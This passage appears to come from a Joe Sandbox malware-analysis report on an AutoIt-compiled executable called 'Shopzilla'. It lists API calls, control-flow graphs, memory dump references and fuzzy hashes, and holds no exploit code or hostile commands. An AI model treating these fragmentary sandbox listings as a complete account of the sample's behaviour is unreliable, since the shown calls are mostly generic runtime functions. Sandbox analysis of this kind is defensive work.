                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                              • String ID: Line %d: $AutoIt -
                                              • API String ID: 230667853-4094128768
                                              • Opcode ID: 17f6151c4817124c4bd1767987bad47b89c16ea82fb5760cc8654e1c2db09796
                                              • Instruction ID: b968945d0c84d656bd2b865ff0a980a6b99ce95164bec9847b8f5e784aa27d34
                                              • Opcode Fuzzy Hash: 17f6151c4817124c4bd1767987bad47b89c16ea82fb5760cc8654e1c2db09796
                                              • Instruction Fuzzy Hash: 7C41A071508304ABC321EB64DCA5BEF77ECAB44354F504A5EF185920A2EFB0AA49C793

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1208 bb50db-bb514b CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BB5109
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BB512A
                                              • ShowWindow.USER32(00000000), ref: 00BB513E
                                              • ShowWindow.USER32(00000000), ref: 00BB5147
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: f70fa15e16cccacccc9adca08970c121a914d2f40addefa2d299b7f4de86f891
                                              • Instruction ID: d852b5287641cbbc6044e47e5f3ee88a4f64f7c7bd2cadb8d691811d5e66e6f1
                                              • Opcode Fuzzy Hash: f70fa15e16cccacccc9adca08970c121a914d2f40addefa2d299b7f4de86f891
                                              • Instruction Fuzzy Hash: B1F0DA716512947EEB3117276C69F2B6F7DD7C7F50F11012AF900A21B1C6E51851DAB0

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1209 c09983-c09a08 call bb4a8c call c09b5e 1214 c09a12-c09ac9 call bb4ab2 * 4 call bb4a8c call bc586c * 2 call bb4ab2 call c09531 call c08d7b 1209->1214 1215 c09a0a 1209->1215 1238 c09ae0-c09ae4 1214->1238 1239 c09acb-c09adb call bc2eb5 * 2 1214->1239 1216 c09a0c-c09a0d 1215->1216 1218 c09b55-c09b5b 1216->1218 1241 c09b45-c09b4b call bc2eb5 1238->1241 1242 c09ae6-c09b3e call c08f2e call bc2eb5 1238->1242 1239->1216 1250 c09b4d-c09b53 1241->1250 1252 c09b43 1242->1252 1250->1218 1252->1250
                                              APIs
                                                • Part of subcall function 00BB4A8C: _fseek.LIBCMT ref: 00BB4AA4
                                                • Part of subcall function 00C09B5E: _wcscmp.LIBCMT ref: 00C09C4E
                                                • Part of subcall function 00C09B5E: _wcscmp.LIBCMT ref: 00C09C61
                                              • _free.LIBCMT ref: 00C09ACC
                                              • _free.LIBCMT ref: 00C09AD3
                                              • _free.LIBCMT ref: 00C09B3E
                                                • Part of subcall function 00BC2EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00BC9B84,00000000,00BC8C8D,00BC58F3), ref: 00BC2EC9
                                                • Part of subcall function 00BC2EB5: GetLastError.KERNEL32(00000000,?,00BC9B84,00000000,00BC8C8D,00BC58F3), ref: 00BC2EDB
                                              • _free.LIBCMT ref: 00C09B46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID: >>>AUTOIT SCRIPT<<<
                                              • API String ID: 1552873950-2806939583
                                              • Opcode ID: 1346061e3226cf363da6d3202720c5d6dba5915e08412292d816603741f79c61
                                              • Instruction ID: 4899724a3b7d9bc03cc2b7a87b5b31e4edff9616f00a0ece67ddfeea372a5e41
                                              • Opcode Fuzzy Hash: 1346061e3226cf363da6d3202720c5d6dba5915e08412292d816603741f79c61
                                              • Instruction Fuzzy Hash: 0B512BB1D04219ABDF249F65DC41BAEBBB9FF48300F0045AEF649A3281DB715A84CF59

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1253 bc556d-bc5586 1254 bc5588-bc558d 1253->1254 1255 bc55a3 1253->1255 1254->1255 1256 bc558f-bc5591 1254->1256 1257 bc55a5-bc55ab 1255->1257 1258 bc55ac-bc55b1 1256->1258 1259 bc5593-bc5598 call bc8c88 1256->1259 1261 bc55bf-bc55c3 1258->1261 1262 bc55b3-bc55bd 1258->1262 1271 bc559e call bc8f16 1259->1271 1264 bc55c5-bc55d0 call bc2f40 1261->1264 1265 bc55d3-bc55d5 1261->1265 1262->1261 1263 bc55e3-bc55f2 1262->1263 1269 bc55f9 1263->1269 1270 bc55f4-bc55f7 1263->1270 1264->1265 1265->1259 1268 bc55d7-bc55e1 1265->1268 1268->1259 1268->1263 1273 bc55fe-bc5603 1269->1273 1270->1273 1271->1255 1275 bc56ec-bc56ef 1273->1275 1276 bc5609-bc5610 1273->1276 1275->1257 1277 bc5651-bc5653 1276->1277 1278 bc5612-bc561a 1276->1278 1279 bc56bd-bc56be call bd0d07 1277->1279 1280 bc5655-bc5657 1277->1280 1278->1277 1281 bc561c 1278->1281 1288 bc56c3-bc56c7 1279->1288 1283 bc5659-bc5661 1280->1283 1284 bc567b-bc5686 1280->1284 1285 bc571a 1281->1285 1286 bc5622-bc5624 1281->1286 1289 bc5671-bc5675 1283->1289 1290 bc5663-bc566f 1283->1290 1291 bc5688 1284->1291 1292 bc568a-bc568d 1284->1292 1287 bc571e-bc5727 1285->1287 1293 bc562b-bc5630 1286->1293 1294 bc5626-bc5628 1286->1294 1287->1257 1288->1287 1297 bc56c9-bc56ce 1288->1297 1298 bc5677-bc5679 1289->1298 1290->1298 1291->1292 1295 bc56f4-bc56f8 1292->1295 1299 bc568f-bc569b call bc4836 call bd0fbe 1292->1299 1293->1295 1296 bc5636-bc564f call bd0e28 1293->1296 1294->1293 1302 bc570a-bc5715 call bc8c88 1295->1302 1303 bc56fa-bc5707 call bc2f40 1295->1303 1311 bc56b2-bc56bb 1296->1311 1297->1295 1301 bc56d0-bc56e1 1297->1301 1298->1292 1314 bc56a0-bc56a5 1299->1314 1307 bc56e4-bc56e6 1301->1307 1302->1271 1303->1302 1307->1275 1307->1276 1311->1307 1315 bc572c-bc5730 1314->1315 1316 bc56ab-bc56ae 1314->1316 1315->1287 1316->1285 1317 bc56b0 1316->1317 1317->1311
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
                                              • Instruction ID: e715db52fbacfac48744449001a278960aa787e55a9c5d086ab07f248b9e8385
                                              • Opcode Fuzzy Hash: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
                                              • Instruction Fuzzy Hash: 94518070A00A05DBDF349F698880F6EB7E6EF54320F6487BEE825962D1D770ADD18B50
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA52E6
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BA534A
                                              • TranslateMessage.USER32(?), ref: 00BA5356
                                              • DispatchMessageW.USER32(?), ref: 00BA5360
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Message$Peek$DispatchTranslate
                                              • String ID:
                                              • API String ID: 1795658109-0
                                              • Opcode ID: bc8f1225b80c9319f897390a25a2d8ccba90f9f8680f2c0c29d26a1fe3d1b734
                                              • Instruction ID: 7915a65c18657467dd677ae087bdfd5cda5c66ed025cf36208e4dcc0ffbd91ad
                                              • Opcode Fuzzy Hash: bc8f1225b80c9319f897390a25a2d8ccba90f9f8680f2c0c29d26a1fe3d1b734
                                              • Instruction Fuzzy Hash: 8F310771508B06ABEF30CB64DC84BBE77E8EB52344F2400DAE452872D1E7F0A989D755
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BA1275,SwapMouseButtons,00000004,?), ref: 00BA12A8
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BA1275,SwapMouseButtons,00000004,?), ref: 00BA12C9
                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BA1275,SwapMouseButtons,00000004,?), ref: 00BA12EB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 1d4e7d596707bf81c5d7e083165e75f23cca50822a3972b2aadf0b2766244a8f
                                              • Instruction ID: cc537814015999c65b50060386d591cf1bc2d413aadedce355ff323cd6078c28
                                              • Opcode Fuzzy Hash: 1d4e7d596707bf81c5d7e083165e75f23cca50822a3972b2aadf0b2766244a8f
                                              • Instruction Fuzzy Hash: D8115A75514208BFDB608FA8DC84FAEBBFCEF06740F104999F805D7110D2319E4497A4
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00C32C4C), ref: 00C03DC4
                                              • GetLastError.KERNEL32 ref: 00C03DD3
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00C03DE2
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C32C4C), ref: 00C03E3F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: a9991f940560518e5d003f15e4489901fb7b715ddb8eb4749a94623961a29292
                                              • Instruction ID: 87fd32788d18cddb5b75672327fed20dd7d18462e115afc5d80aa8994b5ed7f9
                                              • Opcode Fuzzy Hash: a9991f940560518e5d003f15e4489901fb7b715ddb8eb4749a94623961a29292
                                              • Instruction Fuzzy Hash: 78216D715082419FC700EF28C8919AFBBE8EE59764F104A59F4A9C72E2D7309A46CB52
                                              APIs
                                              • _memset.LIBCMT ref: 00BB5B58
                                                • Part of subcall function 00BB56F8: _memset.LIBCMT ref: 00BB5787
                                                • Part of subcall function 00BB56F8: _wcscpy.LIBCMT ref: 00BB57DB
                                                • Part of subcall function 00BB56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BB57EB
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00BB5BAD
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BB5BBC
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BF0CFC
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                              • String ID:
                                              • API String ID: 1378193009-0
                                              • Opcode ID: daabe54ff728229dfd00b1c63283ca38ab1310b4da5a2750079f82707e2386e2
                                              • Instruction ID: 1802181d48276fc2a1ebd086968de7cf5c8f423c51114015d914248dee654809
                                              • Opcode Fuzzy Hash: daabe54ff728229dfd00b1c63283ca38ab1310b4da5a2750079f82707e2386e2
                                              • Instruction Fuzzy Hash: CF21AA715047889FE7729B24C895BFABBECEB11308F0401DDE79A57252C7B42988CB51
                                              APIs
                                                • Part of subcall function 00BB49C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,00BB27AF,?,00000001), ref: 00BB49F4
                                              • _free.LIBCMT ref: 00BEFA84
                                              • _free.LIBCMT ref: 00BEFACB
                                                • Part of subcall function 00BB29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00BB2ADF
                                              Strings
                                              • Bad directive syntax error, xrefs: 00BEFAB3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: Bad directive syntax error
                                              • API String ID: 2861923089-2118420937
                                              • Opcode ID: adacb27b578f9928a23477d0ef70db130fea84c8900d9ce12ce10a29ae425b55
                                              • Instruction ID: 1e1dbf018256382994b6dd791ffd2ddead84296890fc8313f19a7fe25b4feca6
                                              • Opcode Fuzzy Hash: adacb27b578f9928a23477d0ef70db130fea84c8900d9ce12ce10a29ae425b55
                                              • Instruction Fuzzy Hash: 8D913C7191025AAFCF14EFA5C8919FEB7F4FF04310F1045BAE856AB292DB70AA05DB50
                                              APIs
                                                • Part of subcall function 00BB4AB2: __fread_nolock.LIBCMT ref: 00BB4AD0
                                              • _wcscmp.LIBCMT ref: 00C09C4E
                                              • _wcscmp.LIBCMT ref: 00C09C61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _wcscmp$__fread_nolock
                                              • String ID: FILE
                                              • API String ID: 4029003684-3121273764
                                              • Opcode ID: dca5f10bbfaa40ceb581a3491d3dcbb79f4f16b5165c3c688c150bdef50bbf7b
                                              • Instruction ID: a039d652996ca090410add53ee5a1da94c719bc3d7136636ffa41dc863ff4b98
                                              • Opcode Fuzzy Hash: dca5f10bbfaa40ceb581a3491d3dcbb79f4f16b5165c3c688c150bdef50bbf7b
                                              • Instruction Fuzzy Hash: A741D631A40219BBDF219AA1CC45FEFBBF9EF45710F0040AAF900A7282D7B19A45CB65
                                              APIs
                                              • _memset.LIBCMT ref: 00BF02AB
                                              • GetOpenFileNameW.COMDLG32(?), ref: 00BF02F5
                                                • Part of subcall function 00BC01AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB2A58,?,00008000), ref: 00BC01CF
                                                • Part of subcall function 00BC08F0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BC090F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              • Opcode ID: 61e4305b613e35c5a1b0e28a032161dde7f32ae392a3dec8052fa037c1c0c484
                                              • Instruction ID: 637f93137b05ca75b9212607ad867ed88aa5d763e9b5494c92e90b41d5112573
                                              • Opcode Fuzzy Hash: 61e4305b613e35c5a1b0e28a032161dde7f32ae392a3dec8052fa037c1c0c484
                                              • Instruction Fuzzy Hash: 6A218171A10258ABDF41AFD8C845BEE7BF8AF48701F00409AE804A7241DBF4598CCFA5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: faae23a296a0badfaf1babc956ff2ccac7bbfdb0611a0b0c79229bbcd65f1b01
                                              • Instruction ID: 50d20501a2f00a6ad430bd2b1668415ab707d056efd1ef2510d7cbd7d8068aba
                                              • Opcode Fuzzy Hash: faae23a296a0badfaf1babc956ff2ccac7bbfdb0611a0b0c79229bbcd65f1b01
                                              • Instruction Fuzzy Hash: 82F147706083019FC714DF29C484A6ABBE5FF89314F54896EF8AA9B351D770E985CF82
                                              APIs
                                                • Part of subcall function 00BC06E6: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BC0717
                                                • Part of subcall function 00BC06E6: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BC071F
                                                • Part of subcall function 00BC06E6: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BC072A
                                                • Part of subcall function 00BC06E6: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BC0735
                                                • Part of subcall function 00BC06E6: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BC073D
                                                • Part of subcall function 00BC06E6: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BC0745
                                                • Part of subcall function 00BBFE77: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00BAAC6B), ref: 00BBFED2
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BAAD08
                                              • OleInitialize.OLE32(00000000), ref: 00BAAD85
                                              • CloseHandle.KERNEL32(00000000), ref: 00BE2E86
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: bd07bdaa9c1d4b3e6436d14f8712ed36f380f2641092be87f7fedff5e1f62d13
                                              • Instruction ID: ea939b080f4c11a21adfe5934ba7f9b5bd507c7b9872d26a9d82c97415a8a66f
                                              • Opcode Fuzzy Hash: bd07bdaa9c1d4b3e6436d14f8712ed36f380f2641092be87f7fedff5e1f62d13
                                              • Instruction Fuzzy Hash: FB81ABB09152409FCBA4DF3BE99576DBBE8EB58308B10857AD059C7371EBB18404CF91
                                              APIs
                                              • _memset.LIBCMT ref: 00BB59F9
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB5A9E
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BB5ABB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: 067346c2388ab5c6b833792ad1997d076f4d6eed77d0ddcd19f3c172153cd495
                                              • Instruction ID: 4cff1ff8a22854e6582684de27743d4211ae9d7535aa6f8f91248b920c1867f2
                                              • Opcode Fuzzy Hash: 067346c2388ab5c6b833792ad1997d076f4d6eed77d0ddcd19f3c172153cd495
                                              • Instruction Fuzzy Hash: B83193B05057019FD770DF24D8947EBBBF8FB48308F000A6EE59A93250D7B16948CB52
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00BC5883
                                                • Part of subcall function 00BCA2CB: __NMSG_WRITE.LIBCMT ref: 00BCA2F2
                                                • Part of subcall function 00BCA2CB: __NMSG_WRITE.LIBCMT ref: 00BCA2FC
                                              • __NMSG_WRITE.LIBCMT ref: 00BC588A
                                                • Part of subcall function 00BCA328: GetModuleFileNameW.KERNEL32(00000000,00C643BA,00000104,00000004,00000001,00BC0F33), ref: 00BCA3BA
                                                • Part of subcall function 00BCA328: ___crtMessageBoxW.LIBCMT ref: 00BCA468
                                                • Part of subcall function 00BC3201: ___crtCorExitProcess.LIBCMT ref: 00BC3207
                                                • Part of subcall function 00BC3201: ExitProcess.KERNEL32 ref: 00BC3210
                                                • Part of subcall function 00BC8C88: __getptd_noexit.LIBCMT ref: 00BC8C88
                                              • RtlAllocateHeap.NTDLL(00D20000,00000000,00000001,?,00000004,?,?,00BC0F33,?), ref: 00BC58AF
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
